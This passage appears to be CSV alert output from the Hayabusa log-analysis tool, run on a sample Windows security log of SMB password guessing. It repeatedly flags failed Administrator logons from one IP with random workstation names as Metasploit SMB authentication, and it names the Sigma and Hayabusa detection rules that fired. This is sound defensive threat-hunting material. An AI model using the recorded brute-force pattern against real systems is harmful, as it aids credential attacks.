Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aFmILxspIJsiEHwL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.912 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pCz7qbdSEyqxQSKm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.912 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ny3F1xPgakJK0CA7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.960 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Vi7Moaa6d12CzWhl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.001 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4fbbRVOig9bn9p5g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.048 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.079 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qSZrfRe9d0LLkbmA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.079 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QqdZMYsbXFlrKFxk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kypdxj88trEUBEny : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.152 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9hM8fge1IrNsJNd2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SzG27JSj6iAFyiNT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hWcjuW8dU5ATLHzB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.269 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ns9lm9Nvhvi4fY6A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.304 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.353 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aExdYPqY2eUCYZmC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.353 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t9cnmRGdByuJlKZj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.389 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f9RvWTFFUgCrhlkD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HC3oQUIEWqztyx6s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.480 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TK3BOeD2w9xPB4N1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I6yzU5WuvpmPKLSS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GFoUGsara5Pl03WP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.634 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qLaOCImeMIMlGvMj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.634 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.761 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Vzb3pEI2ZeP2NFA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.761 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.821 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7Fa7ebH7UXd1KW4X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.821 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wRBHXRkOa6x5KI5G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.869 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.915 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VNVxzgOLrZzfP3cB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.915 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.944 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yCNXajRX2lIgLQuc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.944 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x0nukf24IoalycOn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.992 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.101 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xZFZN0KfeHtyDppG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.101 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZmxqKyWU5GU1y22P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.144 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WuRyvCfgQ4rwG3fu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3prKZt5ymouwNKnK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.220 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CWrNNn13EC1FLwLA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.264 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SfnBT5OvT5cQXHfS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.308 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RLZFPCShXoPvvThS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.344 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UsPCJ0UlfH4urYrm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.388 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MIQlOetFByLZqPkT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c9IBZ0qTDlHWADZt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.456 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lmhkB39gKvvuT89e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.491 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4KPoZ8JB7WSjUCHW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.536 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0mwiPq4gF1YXkQSl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.615 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y5ncgrpwOFo7E8vg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.615 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.647 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KbkG8ezrAPFC0iKu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.647 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GW4WKkHocNadDzrb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: unbtFAiykcfKTbQT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.732 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oRzF1s9XVoRmoFQ6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.768 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9TO1c7eYd1IQHVwG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.813 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wsn5GM4BqEl6A6pY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.852 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pq350wqwVDQlTKu9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.900 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 